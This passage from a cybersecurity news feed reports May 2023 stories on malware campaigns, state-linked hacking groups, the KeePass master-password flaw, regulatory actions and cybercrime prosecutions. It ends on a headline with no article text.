The app (APK package name "com.tsoft.app.iscreenrecorder"), which accrued over 50,000 installations, was first uploaded on September 19, 2021. The malicious functionality is believed to have been introduced in version 1.3.8, which was released on August 24, 2022.
"It is rare for a developer to upload a legitimate app, wait almost a year, and then update it with malicious code," ESET security researcher Lukα tefanko said in a technical report.
"The malicious code that was added to the clean version of iRecorder is based on the open source AhMyth Android RAT (remote access trojan) and has been customized into what we named AhRat."
iRecorder was first flagged as harboring the AhMyth trojan on October 28, 2022, by Kaspersky security analyst Igor Golovin, indicating that the app managed to stay accessible all this time and even received a new update as recently as February 26, 2023.
The application's malicious behavior specially involves extracting microphone recordings and harvesting files with specific extensions, with ESET describing AhRat as a lightweight version of AhMyth.
The data gathering characteristic points to a possible espionage motive, although there is no evidence to link the activity to any known threat actor. However, AhMyth has been previously employed by Transparent Tribe in attacks targeting South Asia.
iRecorder is the work of a developer named Coffeeholic Dev, who has also released several other apps over the years. None of them are accessible as of writing -
iBlock (com.tsoft.app.iblock.ad)
iCleaner (com.isolar.icleaner)
iEmail (com.tsoft.app.email)
iLock (com.tsoft.app.ilock)
iVideoDownload (com.tsoft.app.ivideodownload)
iVPN (com.ivpn.speed)
File speaker (com.teasoft.filespeaker)
QR Saver (com.teasoft.qrsaver)
Tin nσng tin lạnh (read: Hot news and cold news in Vietnamese) (com.teasoft.news)
This development is just the latest example of malware adopting a technique called versioning, which refers to uploading a clean version of the app to the Play Store to build trust among users and then adding malicious code at a later stage via app updates, in a bid to slip through the app review process.
"The AhRat research case serves as a good example of how an initially legitimate application can transform into a malicious one, even after many months, spying on its users and compromising their privacy," tefanko said.
Legion Malware Upgraded to Target SSH Servers and AWS Credentials
24.5.23 Virus The Hacker News
An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
"This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News.
"It's clear that the developer's targeting of cloud services is advancing with each iteration."
Legion, a Python-based hack tool, was first documented last month by the cloud security firm, detailing its ability to breach vulnerable SMTP servers in order to harvest credentials.
It's also known to exploit web servers running content management systems (CMS), leverage Telegram as a data exfiltration point, and send spam SMS messages to a list of dynamically-generated U.S. mobile numbers by making use of the stolen SMTP credentials.
A notable addition to Legion is its ability to exploit SSH servers using the Paramiko module. It also includes features to retrieve additional AWS-specific credentials related to DynamoDB, CloudWatch, and AWS Owl from Laravel web applications.
Another change relates to the inclusion of additional paths to enumerate for the existence of .env files such as /cron/.env, /lib/.env, /sitemaps/.env, /tools/.env, /uploads/.env, and /web/.env among others.
"Misconfigurations in web applications are still the primary method used by Legion to retrieve credentials," Muir said.
"Therefore, it's recommended that developers and administrators of web applications regularly review access to resources within the applications themselves, and seek alternatives to storing secrets in environment files."
N. Korean Lazarus Group Targets Microsoft IIS Servers to Deploy Espionage Malware
24.5.23 APT The Hacker News
The infamous Lazarus Group actor has been targeting vulnerable versions of Microsoft Internet Information Services (IIS) servers as an initial breach route to deploy malware on targeted systems.
The findings come from the AhnLab Security Emergency response Center (ASEC), which detailed the advanced persistent threat's (APT) continued abuse of DLL side-loading techniques to run arbitrary payloads.
"The threat actor places a malicious DLL (msvcr100.dll) in the same folder path as a normal application (Wordconv.exe) via the Windows IIS web server process, w3wp.exe," ASEC explained. "They then execute the normal application to initiate the execution of the malicious DLL."
DLL side-loading, similar to DLL search-order hijacking, refers to the proxy execution of a rogue DLL via a benign binary planted in the same directory.
Lazarus, a highly-capable and relentless nation-state group linked to North Korea, was most recently spotted leveraging the same technique in connection with the cascading supply chain attack on enterprise communications service provider 3CX.
The malicious msvcr100.dll library, for its part, is designed to decrypt an encoded payload that's then executed in memory. The malware is said to be a variant of a similar artifact that was discovered by ASEC last year and which acted as a backdoor to communicate with an actor-controlled server.
The attack chain further entailed the exploitation of a discontinued open source Notepad++ plugin called Quick Color Picker to deliver additional malware in order to facilitate credential theft and lateral movement.
The latest development demonstrates the diversity of Lazarus attacks and its ability to employ an extensive set of tools against victims to carry out long-term espionage operations.
"In particular, since the threat group primarily utilizes the DLL side-loading technique during their initial infiltrations, companies should proactively monitor abnormal process execution relationships and take preemptive measures to prevent the threat group from carrying out activities such as information exfiltration and lateral movement," ASEC said.
U.S. Treasury Sanctions North Korean Entities#
The findings also come as the U.S. Treasury Department sanctioned four entities and one individual involved in malicious cyber activities and fundraising schemes that aim to support North Korea's strategic priorities.
This includes the Pyongyang University of Automation, the Technical Reconnaissance Bureau and its subordinate cyber unit, the 110th Research Center, Chinyong Information Technology Cooperation Company, and a North Korean national named Kim Sang Man.
The Lazarus Group and its various clusters are believed to be operated by the Technical Reconnaissance Bureau, which oversees North Korea's development of offensive cyber tactics and tools.
The sanctions-hit nation, besides engaging in crypto currency theft and espionage operations, is known to generate illicit revenue from a workforce of skilled IT workers who pose under fictitious identities to obtain jobs in the technology and virtual currency sectors across the world.
"The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue, including in virtual currency, to support the Kim regime and its priorities, such as its unlawful weapons of mass destruction and ballistic missile programs," the department said.
"These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies."
"They earn hundreds of millions of dollars a year by engaging in a wide range of IT development work, including freelance work platforms (websites/applications) and cryptocurrency development, after obtaining freelance employment contracts from companies around the world," the South Korean government warned in December 2022.
Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation
24.5.23 BigBrothers The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign.
The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown.
In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox.
The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware.
This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific extensions (STILLARCH or DownEx).
It's worth noting that DownEx was recently documented by Bitdefender as being used by an unknown actor in highly targeted attacks aimed at government entities in Kazakhstan and Afghanistan.
"Additional study of the infrastructure and related files made it possible to conclude that among the objects of interest of the group are organizations from Mongolia, Kazakhstan, Kyrgyzstan, Israel, [and] India," CERT-UA said.
The findings show that some threat actors are still employing macro-based malware despite Microsoft disabling the feature by default in Office files downloaded from the web.
That said, Microsoft's restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling.
Enterprise security firm Proofpoint said it observed multiple initial access brokers (IABs) actors who infiltrate major targets and then sell that access to other cybercriminals for profit using PDF and OneNote files starting in December 2022.
"The experimentation with and regular pivoting to new payload delivery techniques by tracked threat actors, especially IABs, is vastly different from attack chains observed prior to 2022 and heralds a new normal of threat activity," the company said.
"No longer are the most experienced cybercriminal actors relying on one or a few techniques, but rather are frequently developing and iterating new TTPs. The rapid rate of change for many threat actors suggests they have the time, capability, and understanding of the threat landscape to rapidly develop and execute new techniques."
GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments
24.5.23 BigBrothers The Hacker News
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.
Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.
GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.
What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.
That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.
The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.
While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.
JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.
Geography of victims
Some of the other malware families deployed by GoldenJackal are as follows -
JackalSteal - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
JackalWorm - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
JackalPerInfo - A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.
JackalScreenWatcher - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.
Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.
"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development the number of variants shows that they are still investing in it."
North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware
24.5.23 Virus The Hacker News
The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.
"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.
The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors.
Kimsuky, active since 2012, has exhibited targeting patterns that align with North Korea's operational mandates and priorities.
The intelligence collection missions have involved the use of a diverse set of malware, including another reconnaissance program called ReconShark, as detailed by SentinelOne earlier this month.
The latest activity cluster associated with the group commenced on May 5, 2023, and leverages a variant of RandomQuery that's specifically designed to enumerate files and siphon sensitive data.
RandomQuery, alongside FlowerPower and AppleSeed, are among the most frequently distributed tools in Kimsuky's arsenal, with the former functioning as an information stealer and a conduit for distributing remote access trojans like TutRAT and xRAT.
The attacks begin with phishing emails that purport to be from Daily NK, a prominent Seoul-based online publication that covers North Korean affairs, to entice potential targets into opening a Microsoft Compiled HTML Help (CHM) file.
It's worth noting at this stage that CHM files have also been adopted as a lure by a different North Korean nation-state actor referred to as ScarCruft.
Launching the CHM file leads to the execution of a Visual Basic Script that issues a HTTP GET request to a remote server to retrieve the second-stage payload, a VBScript flavor of RandomQuery.
The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server.
"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.
"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."
The findings arrive days after the AhnLab Security Emergency response Center (ASEC) uncovered a watering hole attack mounted by Kimsuky that entails setting up a lookalike webmail system used by national policy research institutes to harvest credentials entered by victims.
In a related development, Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers to drop the Metasploit Meterpreter post-exploitation framework, which is then used to deploy a Go-based proxy malware.
New WinTapix.sys Malware Engages in Multi-Stage Attack Across Middle East
24.5.23 Virus The Hacker News
An unknown threat actor has been observed leveraging a malicious Windows kernel driver in attacks likely targeting the Middle East since at least May 2020.
Fortinet Fortiguard Labs, which dubbed the artifact WINTAPIX (WinTapix.sys), attributed the malware with low confidence to an Iranian threat actor.
"WinTapix.sys is essentially a loader," security researchers Geri Revay and Hossein Jazi said in a report published on Monday. "Thus, its primary purpose is to produce and execute the next stage of the attack. This is done using a shellcode."
Samples and telemetry data analyzed by Fortinet show that the campaign's primary focus is on Saudi Arabia, Jordan, Qatar, and the United Arab Emirates. The activity has not been tied to a known threat actor or group.
By using a malicious kernel mode driver, the idea is to subvert or disable security mechanisms and gain entrenched access to the targeted host.
Such drivers run within the kernel memory and can, therefore, perform any operation, including altering critical security mechanisms and running arbitrary code with the highest privileges.
In other words, it offers a stealthy way to infiltrate deeper into the targeted system, maintain persistence, and execute additional payloads or commands as part of the threat actor's multi-stage attack.
.jpg)
A key security measure to mitigate against malicious drivers is Driver Signature Enforcement, which ensures that only drivers signed by Microsoft can be loaded on the system. The tech giant also maintains driver block rules to protect against known vulnerable drivers.
WinTapix.sys, on the other hand, comes with an invalid signature, indicating that the threat actor will have to first load a legitimate but vulnerable driver in order to launch WINTAPIX.
But once it's loaded in the kernel, WinTapix.sys is configured to inject an embedded shellcode into an appropriate user mode process that, in turn, executes an encrypted .NET payload that's specifically designed to target Microsoft Internet Information Services (IIS) servers.
WINTAPIX, besides embedding the shellcode created using the open source Donut project, establishes persistence by means of Windows Registry modifications that allows it to be loaded even when the machine is booted in Safe Mode.
For its part, the .NET malware is equipped with backdoor and proxy features to execute commands, carry out file download and upload, and function as a proxy to pass data between two communication endpoints.
"Since Iranian threat actors are known to exploit Exchange servers to deploy additional malware, it is also possible that this driver has been employed alongside Exchange attacks," the researchers said.
"To that point, the compilation time of the drivers is also aligned with times when Iranian threat actors were exploiting Exchange server vulnerabilities."
The development comes as the ALPHV (aka BlackCat or Noberus) ransomware group has been observed taking advantage of a malicious signed driver to impair security defenses and escape detection for extended periods of time.
The driver in question, ktgn.sys, is an updated version of POORTRY that's signed using a stolen or leaked cross-signing certificate, cybersecurity firm Trend Micro said in a report.
POORTRY is the name assigned to a Windows kernel driver that comes with capabilities to terminate security software. Late last year, it was disclosed as used by ransomware gangs and a threat actor known as UNC3944 (aka Roasted 0ktapus and Scattered Spider).
"Malicious actors that are actively seeking high-privilege access to the Windows operating system use techniques that attempt to combat the increased protection on users and processes via endpoint protection platform (EPP) and endpoint detection and response (EDR) technologies," Trend Micro said.
"These malicious actors also tend to possess enough financial resources to either purchase rootkits from underground sources or to buy code-signing certificates to build a rootkit."
China Bans U.S. Chip Giant Micron, Citing "Serious Cybersecurity Problems"
24.5.23 BigBrothers The Hacker News
China has banned U.S. chip maker Micron from selling its products to Chinese companies working on key infrastructure projects, citing national security risks.
The development comes nearly two months after the country's cybersecurity authority initiated a probe in late March 2023 to assess potential network security risks.
"The purpose of this network security review of Micron's products is to prevent product network security problems from endangering the security of national critical information infrastructure, which is a necessary measure to maintain national security," the Cyberspace Administration of China (CAC) said.
The CAC further said the investigation found "serious cybersecurity problems" in Micron's products, endangering the country's critical information infrastructure supply chain.
As a result, operators involved in such critical information infrastructure projects should stop purchasing products from Micron, it added.
The authority did not disclose the specific cybersecurity concerns posed by Micron, but cited violations of local laws and regulations.
In a statement shared with the Wall Street Journal, Micron said it's "evaluating the conclusion and assessing our next steps." The restrictions "have no basis in fact," the U.S. Commerce Department was quoted as saying to BBC.
The tit-for-tat development comes amid escalating geopolitical tensions between China and the U.S., and mirrors similar moves made by the U.S. government against Chinese equipment makers over security concerns.
E.U. Regulators Hit Meta with Record $1.3 Billion Fine for Data Transfer Violations
24.5.23 BigBrothers The Hacker News
Facebook's parent company Meta has been fined a record $1.3 billion by European Union data protection regulators for transferring the personal data of users in the region to the U.S.
In a binding decision taken by the European Data Protection Board (EDPB), the social media giant has been ordered to bring its data transfers into compliance with the GDPR and delete unlawfully stored and processed data within six months.
Additionally, Meta has been given five months to suspend any future transfer of Facebook users' data to the U.S. Instagram and WhatsApp, which are also owned by the company, are not subject to the order.
"The EDPB found that Meta IE's infringement is very serious since it concerns transfers that are systematic, repetitive, and continuous," Andrea Jelinek, EDPB Chair, said in a statement.
"Facebook has millions of users in Europe, so the volume of personal data transferred is massive. The unprecedented fine is a strong signal to organizations that serious infringements have far-reaching consequences."
European data protection authorities have repeatedly emphasized the lack of equivalent privacy protections as that of GDPR in the U.S., potentially allowing American intelligence services to access data belonging to Europeans by virtue of them being shipped to servers located in the U.S.
The ruling stems from a legal complaint filed by Austrian privacy activist Maximilian Schrems, the founder of NOYB, almost a decade ago in June 2013 over concerns that E.U. user data is not sufficiently safeguarded from U.S. mass surveillance programs when transferred across the Atlantic.
"The simplest fix would be reasonable limitations in U.S. surveillance law," Schrems said. "There is an understanding on both sides of the Atlantic that we need probable cause and judicial approval of surveillance.
"It would be time to grant these basic protections to E.U. customers of U.S. cloud providers. Any other big U.S. cloud provider, such as Amazon, Google or Microsoft could be hit with a similar decision under E.U. law."
"Meta plans to rely on the new deal for transfers going forward, but this is likely not a permanent fix," Schrems further added. "In my view, the new deal has maybe a ten percent chance of not being killed by the CJEU. Unless U.S. surveillance laws get fixed, Meta will likely have to keep E.U. data in the E.U."
Schrems also accused the Irish Data Protection Commission (DPC) of consistently attempting to block the case from going forward and trying to shield Meta from being slapped with a fine and having to delete the data that has been already transferred, the latter two of which have been overturned by the EDPB.
Meta, in response, said it intends to appeal the ruling, calling the fine "unjustified and unnecessary" and that there is a "fundamental conflict of law" between the U.S. government's rules on access to data and European privacy rights.
"Without the ability to transfer data across borders, the internet risks being carved up into national and regional silos, restricting the global economy and leaving citizens in different countries unable to access many of the shared services we have come to rely on," Meta's Nick Clegg and Jennifer Newstead said.
Last year, the company warned that if ordered to suspend transfers to the U.S., it may have to stop offering "a number of our most significant products and services" in the E.U. According to the Wall Street Journal, a new trans-Atlantic data transfer deal is expected to be finalized as a replacement for the Privacy Shield later this year.
The fine constitutes the largest ever imposed under the E.U.'s GDPR privacy laws, eclipsing the 746 million ($886.6 million at the time) fine previously doled out to Amazon in July 2021 for similar privacy violations.
The development also marks the third monetary penalty issued by the DPC this year alone. In January, the watchdog levied a fine of 390 million over its mishandling of user information to serve ads in Facebook and Instagram.
Two weeks later, it was fined 5.5 million for violating data protection laws by compelling its users to "consent to the processing of their personal data for service improvement and security" and "making the accessibility of its services conditional on users accepting the updated Terms of Service."
Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations
24.5.23 CyberCrime The Hacker News
A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations.
Cloud security company's Permiso P0 Labs, which first detected the group in November 2021, has assigned it the moniker GUI-vil (pronounced Goo-ee-vil).
"The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "Upon gaining AWS Console access, they conduct their operations directly through the web browser."
Attack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g., CVE-2021-22205).
A successful ingress is followed by privilege escalation and an internal reconnaissance to review all available S3 buckets and determine the services that are accessible via the AWS web console.
A notable aspect of the threat actor's modus operandi is its attempt to blend in and persist within the victim environment by creating new users that conform to the same naming convention and ultimately meet its objectives.
"GUI-vil will also create access keys for the new identities they are creating so they can continue usage of S3 Browser with these new users," P0 Labs researchers Ian Ahl and Daniel Bohannon explained.
Alternatively, the group has also been spotted creating login profiles for existing users that do not have them so as to enable access to the AWS console without raising red flags.
GUI-vil's links to Indonesia stem from the fact that the source IP addresses associated with the activities are linked to two Autonomous System Numbers (ASNs) located in the Southeast Asian country.
"The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities," the researchers said. "In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances."
Bad Magic's Extended Reign in Cyber Espionage Goes Back Over a Decade
24.5.23 BigBrothers The Hacker News
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought.
The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016.
"While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week.
The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone, log keystrokes, grab passwords, and harvest Gmail inboxes.
Bad Magic was first documented by the company in March 2023, detailing the group's use of a backdoor called PowerMagic (aka DBoxShell or GraphShell) and a modular framework dubbed CommonMagic in attacks targeting Russian-occupied territories of Ukraine.
Then earlier this month, Malwarebytes revealed at least five waves of espionage attacks mounted by the group dating back to December 2020.
The deeper insight shared by Kaspersky connects Bad Magic to prior activity based on combing through historical telemetry data, allowing the company to identify various artifacts associated with the CloudWizard framework from 2017 to 2020.
The initial access vector used to drop the first-stage installer is currently unknown. That said, the malware is configured to drop a Windows service ("syncobjsup.dll") and a second file ("mods.lrc"), which, in turn, contains three different modules to harvest and exfiltrate sensitive data.
The information is transmitted in encrypted form to an actor-controlled cloud storage endpoint (OneDrive, Dropbox, or Google Drive). A web server is used as a fallback mechanism in the event none of the services are accessible.
Kaspersky said it identified source code overlaps between an older version of CloudWizard and another malware known as Prikormka, which was discovered by Slovak cybersecurity company ESET in 2016.
Image Source: ESET
The espionage campaign, monitored by ESET under the moniker Operation Groundbait, primarily singled out anti-government separatists in Donetsk and Luhansk and Ukrainian government officials, politicians, and journalists.
Prikormka is deployed via a dropper contained within malicious email attachments and features 13 different components to harvest various kinds of data from compromised machines. Evidence gathered by ESET shows that the malware has been selectively used since at least 2008.
CloudWizard also exhibits resemblances with a related intrusion set called BugDrop that was disclosed by CyberX (which has since been acquired by Microsoft) in 2017, with the industrial cybersecurity company describing it as more advanced than Groundbait.
Commonalities have also been unearthed between CloudWizard and CommonMagic, including identical source code and victimology patterns, indicating that the threat actor has been repeatedly tweaking its malware arsenal and infecting targets for about 15 years.
The latest development, in attributing the CloudWizard framework to the actor behind Operation Groundbait and Operation BugDrop, provides yet another piece to the puzzle that hopes to eventually reveal the bigger picture of the mysterious group's origins.
"The threat actor responsible for these operations has demonstrated a persistent and ongoing commitment to cyber espionage, continuously enhancing their toolset and targeting organizations of interest for over 15 years," Kaspersky researcher Georgy Kucherin said.
"Geopolitical factors continue to be a significant motivator for APT attacks and, given the prevailing tension in the Russo-Ukrainian conflict area, we anticipate that this actor will persist with its operations for the foreseeable future."
U.K. Fraudster Behind iSpoof Scam Receives 13-Year Jail Term for Cyber Crimes
24.5.23 Crime The Hacker News
A U.K. national responsible for his role as the administrator of the now-defunct iSpoof online phone number spoofing service has been sentenced to 13 years and 4 months in prison.
Tejay Fletcher, 35, of Western Gateway, London, was awarded the sentence on May 18, 2023. He pleaded guilty last month to a number of cyber offenses, including facilitating fraud and possessing and transferring criminal property.
iSpoof, which was available as a paid service, allowed fraudsters to mask their phone numbers and masquerade as representatives from banks, tax offices, and other official bodies to defraud victims.
The help desk scam purported to warn targets of suspicious activity on their accounts and tricked them into disclosing sensitive financial information or transferring money to accounts under the threat actor's control.
According to the U.K. Metropolitan Police, the criminals assumed false identities as representatives of various banks such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB.
"The website offered a number of packages for users who would buy, in Bitcoin, the number of minutes they wanted to use the software to make calls," the Met said in a statement.
The total losses to victims in the U.K. alone is said to be more than £48 million ($59.8 million), with confirmed global losses estimated to be at least £100 million ($124.6 million).
iSpoof was dismantled in November 2022 as part of a coordinated law enforcement exercise, resulting in the arrest of Fletcher and 168 other individuals linked to the operation.
Fletcher is believed to have made around £1.7 - £1.9 million ($2.1 - $2.3 million) in illicit proceeds, in addition to owning a Range Rover, a Lamborghini Urus, and high-end watches from Rolex and Audemars Piguet.
"Fletcher spent time marketing iSpoof on the Telegram Channel, The iSpoof Club," the Met noted. "Fletcher set up the channel to promote iSpoof and would update users and promote updates and developments to the website."
A search of his home after his arrest in November 2022 uncovered more than 30 mobile phones and a number of SIM cards that were used to pull off the scheme.
"By setting up iSpoof, Fletcher created a gateway for thousands of criminals to defraud innocent victims out of millions of pounds," Detective Superintendent Helen Rance said. "Meanwhile he was living a luxury lifestyle benefitting from the profits."
KeePass Exploit Allows Attackers to Recover Master Passwords from Memory
24.5.23 Exploit The Hacker News
A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances.
The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month.
"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdohney," who discovered the flaw and devised a PoC, said. "No code execution on the target system is required, just a memory dump."
"It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then."
It's worth noting that successful exploitation of the flaw banks on the condition that an attacker has already compromised a potential target's computer. It also requires that the password is typed on a keyboard, and not copied from the device's clipboard.
vdohney said the vulnerability has to do with how a custom text box field used for entering the master password handles user input. Specifically, it has been found to leave traces of every character the user types in the program memory.
This leads to a scenario whereby an attacker could dump the program's memory and reassemble the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.
The disclosure comes a few months after another medium-severity flaw (CVE-2023-24055) was uncovered in the open source password manager that could be potentially exploited to retrieve cleartext passwords from the password database by leveraging write access to the software's XML configuration file.
KeePass has maintained that the "password database is not intended to be secure against an attacker who has that level of access to the local PC."
It also follows findings from Google security research that detailed a flaw in password managers such as Bitwarden, Dashlane, and Safari, which can be abused to auto-fill saved credentials into untrusted web pages, leading to possible account takeovers.
Meet 'Jack' from Romania! Mastermind Behind Golden Chickens Malware
20.5.23 Virus The Hacker News.png)
The identity of the second threat actor behind the Golden Chickens malware has been uncovered courtesy of a fatal operational security blunder, cybersecurity firm eSentire said.
The individual in question, who lives in Bucharest, Romania, has been given the codename Jack. He is one of the two criminals operating an account on the Russian-language Exploit.in forum under the name "badbullzvenom," the other being "Chuck from Montreal."
eSentire characterized Jack as the true mastermind behind Golden Chickens. Evidence unearthed by the Canadian company shows that he is also listed as the owner of a vegetable and fruit import and export business.
"Like 'Chuck from Montreal,' 'Jack' uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said.
"'Jack' has taken great pains to obfuscate the Golden Chickens malware, trying to make it undetectable by most [antivirus] companies, and strictly allowing only a small number of customers to buy access to the Golden Chickens MaaS."
Golden Chickens (aka More_eggs) is a malware suite used by financially-motivated cybercrime actors such as Cobalt Group and FIN6. The threat actors behind the malware, also known as Venom Spider, operate under a malware-as-a-service (MaaS) model.
The JavaScript malware is distributed via phishing campaigns and comes with several components to harvest financial information, perform lateral movement, and even drop a ransomware plugin for PureLocker called TerraCrypt.
Jack's online activities, according to eSentire, go all the way back to 2008, when he was just 15 years old and signed up for various cybercrime forums as a novice member. All his aliases are being collectively tracked as LUCKY.
The investigation, in putting together his digital trail, traces Jack's progression from a teenager interested in building malicious programs to a longtime hacker involved in developing password stealers, crypters, and More_eggs.
Some of the earliest malware tools developed by Jack in 2008 consisted of Voyer, which is capable of harvesting a user's Yahoo instant messages, and an information stealer christened FlyCatcher that can record keystrokes.
A year later, Jack released a new password stealer dubbed CON that's designed to siphon credentials from different web browsers, VPN, and FTP applications as well as now-defunct messaging apps like MSN Messenger and Yahoo! Messenger.
Jack, later that same year, began advertising a crypter referred to as GHOST to help other actors encrypt and obfuscate malware with the goal of evading detection. The unexpected demise of his father in a car accident is believed to have caused him to pause development of the tool in 2010.
Fast forward to 2012, Jack began to gain a reputation in the cybercriminal community as a scammer for failing to provide adequate support to customers purchasing the product from him.
He also cited "big life problems" in a forum post on April 27, 2012, stating he is contemplating moving to Pakistan to work for the government as a security specialist and that one among his crypter customers "works at pakistan guv" [read government].
It's not immediately clear if Jack ended up going to Pakistan, but eSentire said it spotted tactical overlaps between a 2019 campaign conducted by a Pakistani threat actor known as SideCopy and Jack's VenomLNK malware, which functions as the initial access vector for the More_eggs backdoor.
Jack is suspected to have crossed paths with "Chuck from Montreal" sometime between late 2012 and October 4, 2013, the date on which a message was posted from Chuck's badbullz account on the Lampeduza forum containing contact information a Jabber address associated with LUCKY.
It's speculated that Jack brokered a deal with Chuck that would allow him to post under Chuck's aliases "badbullz" and "badbullzvenom" on various underground forums as a way to get around his notoriety as a ripper.
Lending credence to this hypothesis is the fact that one of LUCKY's new tools, a kit for building macros called MULTIPLIER, was released in 2015 via the badbullzvenom account, while the threat actor behind the LUCKY account ceased posting through that handle.
"By using the badbullzvenom and badbullz accounts, and unbeknownst to forum members, he is essentially starting with a clean slate, and he can continue to build his credibility under the account aliases: badbullz and badbullzvenom," the researcher explained.
Subsequently in 2017, badbullzvenom (aka LUCKY) released a separate tool called VenomKit, which has since evolved into the Golden Chickens MaaS. The malware's ability to evade detection also caught the attention of Cobalt Group, a Russia-based cybercrime gang that leveraged it to deploy Cobalt Strike in attacks aimed at financial entities.
Two years later, another financially motivated threat actor labeled FIN6 (aka ITG08 or Skeleton Spider) was observed using the Golden Chickens service to anchor its intrusions targeting point-of-sale (POS) machines used by retailers in Europe and the U.S.
The cybersecurity firm said it also found the identities of his wife, mother, and two sisters. He and his wife are said to reside in an upscale part of Bucharest, with his wife's social media accounts documenting their trips to cities like London, Paris, and Milan. The photos further show them wearing designer clothing and accessories.
"The threat actor who went by the alias LUCKY and who also shares the badbullz and badbullzvenom accounts with the Montreal-based cybercriminal 'Chuck,' made his fatal mistake when he used the Jabber account," the researchers said.
Notorious Cyber Gang FIN7 Returns Cl0p Ransomware in New Wave of Attacks
20.5.23 Ransomware The Hacker News
